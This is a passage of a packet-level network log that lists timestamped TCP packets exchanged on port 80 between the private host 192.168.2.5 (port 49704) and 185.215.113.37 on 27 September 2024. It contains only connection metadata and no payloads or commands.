Sep 27, 2024 04:14:14.736982107 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.736989021 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.736994028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737009048 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737034082 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737037897 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737045050 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737077951 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737112045 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737126112 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737150908 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737155914 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737169027 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737196922 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737210035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737248898 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737260103 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737270117 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737282038 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737296104 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737322092 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737441063 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737451077 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737462044 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737472057 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737482071 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737509966 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737533092 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737591982 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737602949 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737632036 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737637043 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737647057 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737657070 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737667084 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737672091 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737700939 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737921000 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737938881 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737950087 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737960100 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737962008 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737968922 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.737971067 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.737992048 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.738022089 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.738056898 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738068104 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738079071 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738089085 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738094091 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.738099098 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738110065 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738111019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.738120079 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738140106 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.738154888 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.738316059 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738327026 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738336086 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738347054 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738363028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738363028 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.738379955 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738388062 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.738390923 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738401890 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738404989 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.738411903 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738423109 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738432884 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.738432884 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738461018 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.738475084 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.738769054 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738780022 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738790035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738801956 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738814116 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738816977 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.738823891 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738837004 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.738856077 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.738871098 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.739018917 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739031076 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739042044 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739052057 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739064932 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.739067078 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739084959 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739084959 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.739095926 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739105940 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739105940 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.739116907 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739126921 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739132881 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.739137888 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739149094 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739160061 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739162922 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.739170074 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739175081 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.739192963 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.739223003 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.739474058 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739485979 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.739520073 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.768623114 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.768677950 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.768711090 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.768723011 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.768723011 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.768780947 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.768805981 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.768814087 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.768827915 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.768846989 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.768870115 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.768879890 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.768918037 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.768918037 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.768929005 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.768959999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.768990993 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769006014 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769006014 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769022942 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769057035 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769057035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769064903 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769105911 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769150019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769150019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769153118 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769184113 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769223928 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769228935 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769228935 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769257069 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769288063 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769295931 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769295931 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769319057 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769323111 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769350052 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769382954 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769391060 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769391060 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769437075 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769496918 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769529104 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769571066 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769571066 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769582033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769614935 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769645929 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769654036 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769654036 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769678116 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769687891 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769726992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769768000 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769768000 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769773960 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769804955 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769834995 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769845963 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769845963 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769872904 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769903898 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769903898 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769921064 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769952059 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.769968987 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.769984007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.770020962 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.770020962 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.829188108 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829215050 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829233885 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829246044 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829256058 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829267025 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829278946 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829359055 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829368114 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.829368114 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.829370022 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829381943 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829422951 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.829422951 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.829457998 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829468966 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829479933 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829503059 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.829545975 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.829587936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829597950 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829649925 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829660892 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829663038 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.829687119 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.829741955 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829752922 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829763889 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829775095 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829786062 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829797029 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.829818964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.829865932 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.829895973 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829905987 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829982996 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.829992056 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830001116 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830013037 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830018997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830018997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830023050 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830034018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830061913 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830061913 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830130100 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830231905 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830252886 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830264091 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830272913 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830285072 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830295086 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830302954 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830305099 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830317974 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830329895 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830329895 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830329895 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830364943 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830383062 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830482960 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830493927 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830636024 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830646038 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830651999 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830657005 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830667973 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830677986 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830688953 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830688953 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830688953 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830698967 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830709934 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830718994 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830720901 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830754042 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830754042 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.830918074 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830928087 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830934048 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.830991030 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831001997 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831012011 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831023932 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.831023932 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.831069946 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.831263065 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831274033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831284046 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831294060 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831305027 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831315994 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831320047 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.831320047 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.831326008 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831336975 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831346989 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831358910 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.831377983 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.831398964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.831597090 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831608057 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831618071 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831628084 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831638098 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831649065 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831659079 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831666946 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.831666946 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.831669092 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831687927 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.831736088 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.831880093 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831891060 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831902027 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831912041 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831923008 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831933022 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831943989 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.831947088 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.831947088 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.831988096 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.861016035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861049891 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861066103 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861077070 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861085892 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861095905 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861107111 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861218929 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861231089 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861315966 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861325979 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861336946 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861341953 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.861341953 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.861347914 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861366034 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.861452103 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.861485958 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861498117 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861507893 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861519098 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861530066 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861540079 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861545086 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.861552000 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861565113 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.861565113 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.861588001 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:14.861694098 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861705065 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861715078 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:14.861762047 CEST	49704	80	192.168.2.5	185.215.113.37
